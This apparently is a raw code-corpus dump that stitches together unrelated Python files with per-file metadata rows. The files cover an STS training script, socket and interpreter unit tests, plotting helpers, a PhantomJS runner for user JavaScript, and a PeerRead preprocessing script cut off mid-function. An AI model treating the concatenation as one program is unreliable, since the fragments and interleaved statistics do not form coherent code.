valid_file_path = os.path.join(args.data_dir, args.valid_filename)
train_json = read_json(train_file_path)
valid_json = read_json(valid_file_path)
train_dataset = KlueStsWithSentenceMaskDataset(train_json, tokenizer, 510)
valid_dataset = KlueStsWithSentenceMaskDataset(valid_json, tokenizer, 510)
model = RobertaForStsRegression.from_pretrained(
args.model_name_or_path, config=config
)
model.to(device)
training_args = TrainingArguments(
output_dir=args.model_dir,
save_total_limit=args.save_total_limit,
save_steps=args.save_steps,
num_train_epochs=args.num_train_epochs,
learning_rate=args.learning_rate,
per_device_train_batch_size=args.batch_size,
per_device_eval_batch_size=64,
gradient_accumulation_steps=args.gradient_accumulation_steps,
weight_decay=args.weight_decay,
logging_dir="./logs",
logging_steps=args.save_steps,
evaluation_strategy=args.evaluation_strategy,
metric_for_best_model="pearsonr",
fp16=True,
fp16_opt_level="O1",
eval_steps=args.save_steps,
load_best_model_at_end=True,
)
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=valid_dataset,
compute_metrics=compute_metrics,
)
trainer.train()
model.save_pretrained(args.model_dir)
tokenizer.save_pretrained(args.model_dir)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# data_arg
parser.add_argument("--data_dir", type=str, default="./data")
parser.add_argument("--model_dir", type=str, default="./model")
parser.add_argument("--output_dir", type=str, default="./output")
parser.add_argument("--model_name_or_path", type=str, default="klue/roberta-large")
parser.add_argument(
"--train_filename", type=str, default="klue-sts-v1.1_train.json"
)
parser.add_argument("--valid_filename", type=str, default="klue-sts-v1.1_dev.json")
# train_arg
parser.add_argument("--num_labels", type=int, default=1)
parser.add_argument("--seed", type=int, default=15)
parser.add_argument("--num_train_epochs", type=int, default=5)
parser.add_argument("--batch_size", type=int, default=64)
parser.add_argument("--learning_rate", type=float, default=5e-5)
parser.add_argument("--gradient_accumulation_steps", type=int, default=1)
parser.add_argument("--weight_decay", type=float, default=0.01)
# eval_arg
parser.add_argument("--evaluation_strategy", type=str, default="steps")
parser.add_argument("--save_steps", type=int, default=250)
parser.add_argument("--eval_steps", type=int, default=250)
parser.add_argument("--save_total_limit", type=int, default=2)
args = parser.parse_args()
main(args)
| 37.073684
| 87
| 0.727144
| 457
| 3,522
| 5.282276
| 0.2407
| 0.06338
| 0.119718
| 0.024855
| 0.228252
| 0.206711
| 0.158658
| 0.118476
| 0.027341
| 0
| 0
| 0.01253
| 0.161556
| 3,522
| 94
| 88
| 37.468085
| 0.804944
| 0.007666
| 0
| 0
| 0
| 0
| 0.107992
| 0.027499
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013158
| false
| 0
| 0.118421
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60edf40403e6f66a0e02912003729be0d59531bb
| 1,760
|
py
|
Python
|
test/test_base_client.py
|
walkr/nanoservice
|
e2098986b1baa5f283167ae487d14f3c6c21961a
|
[
"MIT"
] | 28
|
2015-03-26T10:25:31.000Z
|
2022-01-31T21:59:11.000Z
|
test/test_base_client.py
|
walkr/nanoservice
|
e2098986b1baa5f283167ae487d14f3c6c21961a
|
[
"MIT"
] | 3
|
2015-09-14T04:10:04.000Z
|
2020-01-29T03:52:05.000Z
|
test/test_base_client.py
|
walkr/nanoservice
|
e2098986b1baa5f283167ae487d14f3c6c21961a
|
[
"MIT"
] | 9
|
2015-09-10T08:11:37.000Z
|
2020-11-08T10:41:51.000Z
|
import unittest
from nanoservice import Responder
from nanoservice import Requester
class BaseTestCase(unittest.TestCase):
def setUp(self):
addr = 'inproc://test'
self.client = Requester(addr)
self.service = Responder(addr)
self.service.register('divide', lambda x, y: x / y)
self.service.register('echo', lambda x: x)
def tearDown(self):
self.client.socket.close()
self.service.socket.close()
class TestClient(BaseTestCase):
def test_build_payload(self):
payload = self.client.build_payload('echo', 'My Name')
method, args, ref = payload
self.assertTrue(method == 'echo')
self.assertTrue(len(payload) == 3)
def test_encoder(self):
data = {'name': 'Joe Doe'}
encoded = self.client.encode(data)
decoded = self.client.decode(encoded)
self.assertEqual(data, decoded)
def test_call_wo_receive(self):
# Requester side ops
method, args = 'echo', 'hello world'
payload = self.client.build_payload(method, args)
self.client.socket.send(self.client.encode(payload))
# Responder side ops
method, args, ref = self.service.receive()
self.assertEqual(method, 'echo')
self.assertEqual(args, 'hello world')
self.assertEqual(ref, payload[2])
def test_basic_socket_operation(self):
msg = 'abc'
self.client.socket.send(msg)
res = self.service.socket.recv().decode('utf-8')
self.assertEqual(msg, res)
def test_timeout(self):
c = Requester('inproc://timeout', timeouts=(1, 1))
c.socket.send('hello')
self.assertRaises(Exception, c.socket.recv)
if __name__ == '__main__':
unittest.main()
| 29.830508
| 62
| 0.630682
| 209
| 1,760
| 5.215311
| 0.339713
| 0.082569
| 0.044037
| 0.040367
| 0.053211
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003745
| 0.241477
| 1,760
| 58
| 63
| 30.344828
| 0.812734
| 0.021023
| 0
| 0
| 0
| 0
| 0.067442
| 0
| 0
| 0
| 0
| 0
| 0.186047
| 1
| 0.162791
| false
| 0
| 0.069767
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f2562d19bb7ab823ff8910d39c430258f1cd35
| 723
|
py
|
Python
|
Sensor Fusion and Tracking/Kalman Filters/Gaussian/gaussian.py
|
kaka-lin/autonomous-driving-notes
|
6c1b29752d6deb679637766b6cea5c6fe5b72319
|
[
"MIT"
] | null | null | null |
Sensor Fusion and Tracking/Kalman Filters/Gaussian/gaussian.py
|
kaka-lin/autonomous-driving-notes
|
6c1b29752d6deb679637766b6cea5c6fe5b72319
|
[
"MIT"
] | null | null | null |
Sensor Fusion and Tracking/Kalman Filters/Gaussian/gaussian.py
|
kaka-lin/autonomous-driving-notes
|
6c1b29752d6deb679637766b6cea5c6fe5b72319
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
def gaussian(x, mean, std):
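# Probability density of a normal distribution with the given mean and std:
#   f(x) = 1 / sqrt(2*pi*std^2) * exp(-(x - mean)^2 / (2*std^2))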
std2 = np.power(std, 2)
return (1 / np.sqrt(2* np.pi * std2)) * np.exp(-.5 * (x - mean)**2 / std2)
if __name__ == "__main__":
gauss_1 = gaussian(10, 8, 2) # 0.12098536225957168
gauss_2 = gaussian(10, 10, 2) # 0.19947114020071635
print("Gauss(10, 8, 2): {}".format(gauss_1))
print("Gauss(10, 10, 2): {}".format(gauss_2))
# Standard Gaussian distribution
mean = 0
variance = 1
std = np.sqrt(variance)
# Plot between -5 and 5 with 0.001 steps.
x = np.arange(-5, 5, 0.001)
gauss = []
for i in x:
gauss.append(gaussian(i, mean, std))
gauss = np.array(gauss)
plt.plot(x, gauss)
plt.show()
| 23.322581
| 78
| 0.580913
| 114
| 723
| 3.578947
| 0.412281
| 0.02451
| 0.019608
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149723
| 0.251729
| 723
| 30
| 79
| 24.1
| 0.604436
| 0.120332
| 0
| 0
| 0
| 0
| 0.074485
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.1
| 0
| 0.2
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f26fe4816d83e373acca7a0999becfe86e2ce4
| 9,029
|
py
|
Python
|
part19/test_interpreter.py
|
fazillatheef/lsbasi
|
07e1a14516156a21ebe2d82e0bae4bba5ad73dd6
|
[
"MIT"
] | 1,682
|
2015-06-15T11:42:03.000Z
|
2022-03-29T12:40:35.000Z
|
part19/test_interpreter.py
|
fazillatheef/lsbasi
|
07e1a14516156a21ebe2d82e0bae4bba5ad73dd6
|
[
"MIT"
] | 10
|
2017-06-22T11:35:21.000Z
|
2022-02-26T17:37:42.000Z
|
part19/test_interpreter.py
|
fazillatheef/lsbasi
|
07e1a14516156a21ebe2d82e0bae4bba5ad73dd6
|
[
"MIT"
] | 493
|
2015-07-05T09:05:09.000Z
|
2022-03-28T03:33:33.000Z
|
import unittest
class LexerTestCase(unittest.TestCase):
def makeLexer(self, text):
from spi import Lexer
lexer = Lexer(text)
return lexer
def test_tokens(self):
from spi import TokenType
records = (
('234', TokenType.INTEGER_CONST, 234),
('3.14', TokenType.REAL_CONST, 3.14),
('*', TokenType.MUL, '*'),
('DIV', TokenType.INTEGER_DIV, 'DIV'),
('/', TokenType.FLOAT_DIV, '/'),
('+', TokenType.PLUS, '+'),
('-', TokenType.MINUS, '-'),
('(', TokenType.LPAREN, '('),
(')', TokenType.RPAREN, ')'),
(':=', TokenType.ASSIGN, ':='),
('.', TokenType.DOT, '.'),
('number', TokenType.ID, 'number'),
(';', TokenType.SEMI, ';'),
('BEGIN', TokenType.BEGIN, 'BEGIN'),
('END', TokenType.END, 'END'),
('PROCEDURE', TokenType.PROCEDURE, 'PROCEDURE'),
)
for text, tok_type, tok_val in records:
lexer = self.makeLexer(text)
token = lexer.get_next_token()
self.assertEqual(token.type, tok_type)
self.assertEqual(token.value, tok_val)
def test_lexer_exception(self):
from spi import LexerError
lexer = self.makeLexer('<')
with self.assertRaises(LexerError):
lexer.get_next_token()
class ParserTestCase(unittest.TestCase):
def makeParser(self, text):
from spi import Lexer, Parser
lexer = Lexer(text)
parser = Parser(lexer)
return parser
def test_expression_invalid_syntax_01(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 10 * ; {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, ';')
self.assertEqual(the_exception.token.lineno, 6)
def test_expression_invalid_syntax_02(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 1 (1 + 2); {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, '(')
self.assertEqual(the_exception.token.lineno, 6)
def test_maximum_one_VAR_block_is_allowed(self):
from spi import ParserError, ErrorCode
# zero VARs
parser = self.makeParser(
"""
PROGRAM Test;
BEGIN
END.
"""
)
parser.parse()
# one VAR
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
END.
"""
)
parser.parse()
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
VAR
b : INTEGER;
BEGIN
a := 5;
b := a + 10;
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, 'VAR')
self.assertEqual(the_exception.token.lineno, 5) # second VAR
class SemanticAnalyzerTestCase(unittest.TestCase):
def runSemanticAnalyzer(self, text):
from spi import Lexer, Parser, SemanticAnalyzer
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
return semantic_analyzer
def test_semantic_duplicate_id_error(self):
from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
a : REAL; {Duplicate identifier}
BEGIN
a := 5;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.DUPLICATE_ID)
self.assertEqual(the_exception.token.value, 'a')
self.assertEqual(the_exception.token.lineno, 5)
def test_semantic_id_not_found_error(self):
from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 5 + b;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.ID_NOT_FOUND)
self.assertEqual(the_exception.token.value, 'b')
class TestCallStack:
def __init__(self):
self._records = []
def push(self, ar):
self._records.append(ar)
def pop(self):
# do nothing
pass
def peek(self):
return self._records[-1]
class InterpreterTestCase(unittest.TestCase):
def makeInterpreter(self, text):
from spi import Lexer, Parser, SemanticAnalyzer, Interpreter
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
interpreter = Interpreter(tree)
interpreter.call_stack = TestCallStack()
return interpreter
def test_integer_arithmetic_expressions(self):
for expr, result in (
('3', 3),
('2 + 7 * 4', 30),
('7 - 8 DIV 4', 5),
('14 + 2 * 3 - 6 DIV 2', 17),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1))', 22),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1)) DIV (2 + 3) - 5 - 3 + (8)', 10),
('7 + (((3 + 2)))', 12),
('- 3', -3),
('+ 3', 3),
('5 - - - + - 3', 8),
('5 - - - + - (3 + 4) - +2', 10),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_float_arithmetic_expressions(self):
for expr, result in (
('3.14', 3.14),
('2.14 + 7 * 4', 30.14),
('7.14 - 8 / 4', 5.14),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : REAL;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_procedure_call(self):
text = """\
program Main;
procedure Alpha(a : integer; b : integer);
var x : integer;
begin
x := (a + b ) * 2;
end;
begin { Main }
Alpha(3 + 5, 7);
end. { Main }
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], 8)
self.assertEqual(ar['b'], 7)
self.assertEqual(ar['x'], 30)
self.assertEqual(ar.nesting_level, 2)
def test_program(self):
text = """\
PROGRAM Part12;
VAR
number : INTEGER;
a, b : INTEGER;
y : REAL;
PROCEDURE P1;
VAR
a : REAL;
k : INTEGER;
PROCEDURE P2;
VAR
a, z : INTEGER;
BEGIN {P2}
z := 777;
END; {P2}
BEGIN {P1}
END; {P1}
BEGIN {Part12}
number := 2;
a := number ;
b := 10 * a + 10 * number DIV 4;
y := 20 / 7 + 3.14
END. {Part12}
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(len(ar.members.keys()), 4)
self.assertEqual(ar['number'], 2)
self.assertEqual(ar['a'], 2)
self.assertEqual(ar['b'], 25)
self.assertAlmostEqual(ar['y'], float(20) / 7 + 3.14) # 5.9971...
if __name__ == '__main__':
unittest.main()
| 27.95356
| 84
| 0.507144
| 895
| 9,029
| 5.001117
| 0.165363
| 0.087131
| 0.0563
| 0.08445
| 0.569482
| 0.546917
| 0.509383
| 0.461796
| 0.412645
| 0.395442
| 0
| 0.030057
| 0.373574
| 9,029
| 322
| 85
| 28.040373
| 0.761315
| 0.005427
| 0
| 0.350711
| 0
| 0.004739
| 0.115077
| 0
| 0
| 0
| 0
| 0
| 0.156398
| 1
| 0.090047
| false
| 0.004739
| 0.056872
| 0.004739
| 0.194313
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f6336cf78fe6b4d87ec03f5cf82a49ade1394b
| 3,493
|
py
|
Python
|
recnn/utils/plot.py
|
ihash5/reinforcement-learning
|
c72e9db33c6ed6abd34e9f48012189369b7cd5d0
|
[
"Apache-2.0"
] | 1
|
2021-04-10T08:21:21.000Z
|
2021-04-10T08:21:21.000Z
|
recnn/utils/plot.py
|
ihash5/reinforcement-learning
|
c72e9db33c6ed6abd34e9f48012189369b7cd5d0
|
[
"Apache-2.0"
] | null | null | null |
recnn/utils/plot.py
|
ihash5/reinforcement-learning
|
c72e9db33c6ed6abd34e9f48012189369b7cd5d0
|
[
"Apache-2.0"
] | null | null | null |
from scipy.spatial import distance
from scipy import ndimage
import matplotlib.pyplot as plt
import torch
from scipy import stats
import numpy as np
def pairwise_distances_fig(embs):
embs = embs.detach().cpu().numpy()
similarity_matrix_cos = distance.cdist(embs, embs, 'cosine')
similarity_matrix_euc = distance.cdist(embs, embs, 'euclidean')
fig = plt.figure(figsize=(16,10))
ax = fig.add_subplot(121)
cax = ax.matshow(similarity_matrix_cos)
fig.colorbar(cax)
ax.set_title('Cosine')
ax.axis('off')
ax = fig.add_subplot(122)
cax = ax.matshow(similarity_matrix_euc)
fig.colorbar(cax)
ax.set_title('Euclidean')
ax.axis('off')
fig.suptitle('Action pairwise distances')
plt.close()
return fig
def pairwise_distances(embs):
fig = pairwise_distances_fig(embs)
fig.show()
def smooth(scalars, weight): # Weight between 0 and 1
last = scalars[0] # First value in the plot (first timestep)
smoothed = list()
for point in scalars:
smoothed_val = last * weight + (1 - weight) * point # Calculate smoothed value
smoothed.append(smoothed_val) # Save it
last = smoothed_val # Anchor the last smoothed value
return smoothed
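# Worked example of the smoothing above (hypothetical values): with weight=0.9,
# smooth([0, 10, 0, 10], 0.9) -> [0.0, 1.0, 0.9, 1.81]
# (each output is 0.9 * previous_output + 0.1 * current_input).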
def smooth_gauss(arr, var):
return ndimage.gaussian_filter1d(arr, var)
class Plotter:
def __init__(self, loss, style):
self.loss = loss
self.style = style
self.smoothing = lambda x: smooth_gauss(x, 4)
def set_smoothing_func(self, f):
self.smoothing = f
def plot_loss(self):
for row in self.style:
fig, axes = plt.subplots(1, len(row), figsize=(16, 6))
if len(row) == 1: axes = [axes]
for col in range(len(row)):
key = row[col]
axes[col].set_title(key)
axes[col].plot(self.loss['train']['step'],
self.smoothing(self.loss['train'][key]), 'b-',
label='train')
axes[col].plot(self.loss['test']['step'],
self.loss['test'][key], 'r-.',
label='test')
plt.legend()
plt.show()
def log_loss(self, key, item, test=False):
kind = 'train'
if test:
kind = 'test'
self.loss[kind][key].append(item)
def log_losses(self, losses, test=False):
for key, val in losses.items():
self.log_loss(key, val, test)
@staticmethod
def kde_reconstruction_error(ad, gen_actions, true_actions, device=torch.device('cpu')):
def rec_score(actions):
return ad.rec_error(torch.tensor(actions).to(device).float()).detach().cpu().numpy()
true_scores = rec_score(true_actions)
gen_scores = rec_score(gen_actions)
true_kernel = stats.gaussian_kde(true_scores)
gen_kernel = stats.gaussian_kde(gen_scores)
x = np.linspace(0, 1000, 100)
probs_true = true_kernel(x)
probs_gen = gen_kernel(x)
fig = plt.figure(figsize=(16, 10))
ax = fig.add_subplot(111)
ax.plot(x, probs_true, '-b', label='true dist')
ax.plot(x, probs_gen, '-r', label='generated dist')
ax.legend()
return fig
@staticmethod
def plot_kde_reconstruction_error(*args, **kwargs):
fig = Plotter.kde_reconstruction_error(*args, **kwargs)
fig.show()
| 30.373913
| 96
| 0.590896
| 445
| 3,493
| 4.494382
| 0.310112
| 0.028
| 0.012
| 0.0225
| 0.144
| 0.097
| 0.038
| 0.038
| 0.038
| 0.038
| 0
| 0.014464
| 0.287432
| 3,493
| 114
| 97
| 30.640351
| 0.789072
| 0.036358
| 0
| 0.136364
| 0
| 0
| 0.041679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.068182
| 0.022727
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f86292339dc07295795b770971581f3a845840
| 2,855
|
py
|
Python
|
backend/user/scripter.py
|
ivaivalous/ivodb
|
e9b0969225fdb725d35a2ecfab21f87d1d9b2a00
|
[
"MIT"
] | null | null | null |
backend/user/scripter.py
|
ivaivalous/ivodb
|
e9b0969225fdb725d35a2ecfab21f87d1d9b2a00
|
[
"MIT"
] | null | null | null |
backend/user/scripter.py
|
ivaivalous/ivodb
|
e9b0969225fdb725d35a2ecfab21f87d1d9b2a00
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import responses
from selenium import webdriver
# This file contains/references the default JS
# used to provide functions dealing with input/output
SCRIPT_RUNNER = "runner.html"
ENCODING = 'utf-8'
PAGE_LOAD_TIMEOUT = 5
PAGE_LOAD_TIMEOUT_MS = PAGE_LOAD_TIMEOUT * 1000
capabilities = webdriver.DesiredCapabilities.PHANTOMJS
capabilities["phantomjs.page.settings.resourceTimeout"] = PAGE_LOAD_TIMEOUT_MS
capabilities["phantomjs.page.settings.loadImages"] = False
SCRIPT_TEMPLATE = """
window.requestData = {{method:"{0}", headers:{1}, data:"{2}", params:{3}}};
window.method = requestData.method;
window.headers = requestData.headers;
window.data = requestData.data;
window.params = requestData.params;
window.logs = [];
window.log = function(message) {{
window.logs.push({{
"time": (new Date).getTime(),
"message": message
}})
}};
"""
GET_LOGS_SCRIPT = 'return window.logs;'
class Scripter:
def __init__(self):
self.driver = webdriver.PhantomJS(desired_capabilities=capabilities)
self.driver.implicitly_wait(PAGE_LOAD_TIMEOUT)
self.driver.set_page_load_timeout(PAGE_LOAD_TIMEOUT)
def run(self, request, script_body, input_params):
self.driver.get(SCRIPT_RUNNER)
self.driver.execute_script(
Scripter.build_runner_script(request, input_params))
try:
response = self.execute_user_script(script_body)
logs = self.driver.execute_script(GET_LOGS_SCRIPT)
return response.encode(ENCODING), logs
except:
return responses.get_invalid_request(), []
def execute_user_script(self, script_body):
"""Execute a user-contributed script."""
return self.driver.execute_script(script_body)
@staticmethod
def build_runner_script(request, input_params):
# Build JS related to having access to input
# and request data.
return SCRIPT_TEMPLATE.format(
request.method,
Scripter.build_headers_map(request.headers),
request.get_data().encode(ENCODING),
Scripter.build_params_map(input_params.encode(ENCODING)))
@staticmethod
def build_params_map(input_params):
# input_params looks like "test=aaa&test2=jjj"
couples = input_params.split("&")
params_map = {}
for couple in couples:
c = couple.split("=")
key = c[0]
value = c[1] if len(c) > 1 else ""
params_map[key] = value
return params_map
@staticmethod
def build_headers_map(headers):
headers_map = {}
for key, value in headers:
if 'jwt=' in value:
continue
headers_map[key] = value.encode(ENCODING)
return headers_map
| 31.032609
| 79
| 0.652539
| 327
| 2,855
| 5.48318
| 0.348624
| 0.031233
| 0.058561
| 0.038483
| 0.066927
| 0.039041
| 0
| 0
| 0
| 0
| 0
| 0.006497
| 0.245184
| 2,855
| 91
| 80
| 31.373626
| 0.825522
| 0.090368
| 0
| 0.045455
| 0
| 0.015152
| 0.206497
| 0.028229
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.030303
| 0.015152
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f89950c5e281ca1dca03166764cafad747aec6
| 1,490
|
py
|
Python
|
bwtougu/api/names.py
|
luhouxiang/byrobot
|
e110e7865965a344d2b61cb925c959cee1387758
|
[
"Apache-2.0"
] | null | null | null |
bwtougu/api/names.py
|
luhouxiang/byrobot
|
e110e7865965a344d2b61cb925c959cee1387758
|
[
"Apache-2.0"
] | null | null | null |
bwtougu/api/names.py
|
luhouxiang/byrobot
|
e110e7865965a344d2b61cb925c959cee1387758
|
[
"Apache-2.0"
] | 1
|
2018-09-28T08:59:38.000Z
|
2018-09-28T08:59:38.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
VALID_HISTORY_FIELDS = [
'datetime', 'open', 'close', 'high', 'low', 'total_turnover', 'volume',
'acc_net_value', 'discount_rate', 'unit_net_value',
'limit_up', 'limit_down', 'open_interest', 'basis_spread', 'settlement', 'prev_settlement'
]
VALID_GET_PRICE_FIELDS = [
'OpeningPx', 'ClosingPx', 'HighPx', 'LowPx', 'TotalTurnover', 'TotalVolumeTraded',
'AccNetValue', 'UnitNetValue', 'DiscountRate',
'SettlPx', 'PrevSettlPx', 'OpenInterest', 'BasisSpread', 'HighLimitPx', 'LowLimitPx'
]
VALID_TENORS = [
'0S', '1M', '2M', '3M', '6M', '9M', '1Y', '2Y', '3Y', '4Y',
'5Y', '6Y', '7Y', '8Y', '9Y', '10Y', '15Y', '20Y', '30Y',
'40Y', '50Y'
]
VALID_INSTRUMENT_TYPES = [
'CS', 'Future', 'INDX', 'ETF', 'LOF', 'SF', 'FenjiA', 'FenjiB', 'FenjiMu',
'Stock', 'Fund', 'Index'
]
VALID_XUEQIU_FIELDS = [
'new_comments', 'total_comments',
'new_followers', 'total_followers',
'sell_actions', 'buy_actions',
]
VALID_MARGIN_FIELDS = [
'margin_balance',
'buy_on_margin_value',
'short_sell_quantity',
'margin_repayment',
'short_balance_quantity',
'short_repayment_quantity',
'short_balance',
'total_balance'
]
VALID_SHARE_FIELDS = [
'total', 'circulation_a', 'management_circulation', 'non_circulation_a', 'total_a'
]
VALID_TURNOVER_FIELDS = (
'today',
'week',
'month',
'three_month',
'six_month',
'year',
'current_year',
'total',
)
| 25.689655
| 94
| 0.619463
| 160
| 1,490
| 5.43125
| 0.6875
| 0.018412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022801
| 0.175839
| 1,490
| 57
| 95
| 26.140351
| 0.684853
| 0.028188
| 0
| 0
| 0
| 0
| 0.515214
| 0.047026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f8eaaad292345c3bccc32bf4de41d8a5ec6e07
| 9,830
|
py
|
Python
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
|
dveni/causal-text-embeddings
|
82104f3fb6fd540cf98cb4ca0fd5b5d1fb5f757a
|
[
"MIT"
] | 114
|
2019-05-31T03:54:05.000Z
|
2022-03-28T06:37:27.000Z
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
|
dveni/causal-text-embeddings
|
82104f3fb6fd540cf98cb4ca0fd5b5d1fb5f757a
|
[
"MIT"
] | 7
|
2019-08-12T01:35:22.000Z
|
2020-09-23T17:32:46.000Z
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
|
dveni/causal-text-embeddings
|
82104f3fb6fd540cf98cb4ca0fd5b5d1fb5f757a
|
[
"MIT"
] | 20
|
2019-06-03T05:33:10.000Z
|
2022-02-04T19:34:41.000Z
|
"""
Simple pre-processing for PeerRead papers.
Takes in JSON formatted data from ScienceParse and outputs a tfrecord
Reference example:
https://github.com/tensorlayer/tensorlayer/blob/9528da50dfcaf9f0f81fba9453e488a1e6c8ee8f/examples/data_process/tutorial_tfrecord3.py
"""
import argparse
import glob
import os
import random
import io
import json
from dateutil.parser import parse as parse_date
import tensorflow as tf
import bert.tokenization as tokenization
from PeerRead.ScienceParse.Paper import Paper
from PeerRead.ScienceParse.ScienceParseReader import ScienceParseReader
from PeerRead.data_cleaning.PeerRead_hand_features import get_PeerRead_hand_features
rng = random.Random(0)
def process_json_paper(paper_json_filename, scienceparse_dir, tokenizer):
paper = Paper.from_json(paper_json_filename)
paper.SCIENCEPARSE = ScienceParseReader.read_science_parse(paper.ID, paper.TITLE, paper.ABSTRACT,
scienceparse_dir)
# tokenize PeerRead features
try:
title_tokens = tokenizer.tokenize(paper.TITLE)
except ValueError: # missing titles are quite common in ScienceParse output
print("Missing title for " + paper_json_filename)
title_tokens = None
abstract_tokens = tokenizer.tokenize(paper.ABSTRACT)
text_features = {'title': title_tokens,
'abstract': abstract_tokens}
context_features = {'authors': paper.AUTHORS,
'accepted': paper.ACCEPTED,
'name': paper.ID}
# add hand crafted features from PeerRead
pr_hand_features = get_PeerRead_hand_features(paper)
context_features.update(pr_hand_features)
return text_features, context_features
def bert_process_sentence(example_tokens, max_seq_length, tokenizer):
"""
Tokenization and pre-processing of text as expected by Bert
Parameters
----------
example_tokens
max_seq_length
tokenizer
Returns
-------
"""
# Account for [CLS] and [SEP] with "- 2"
if len(example_tokens) > max_seq_length - 2:
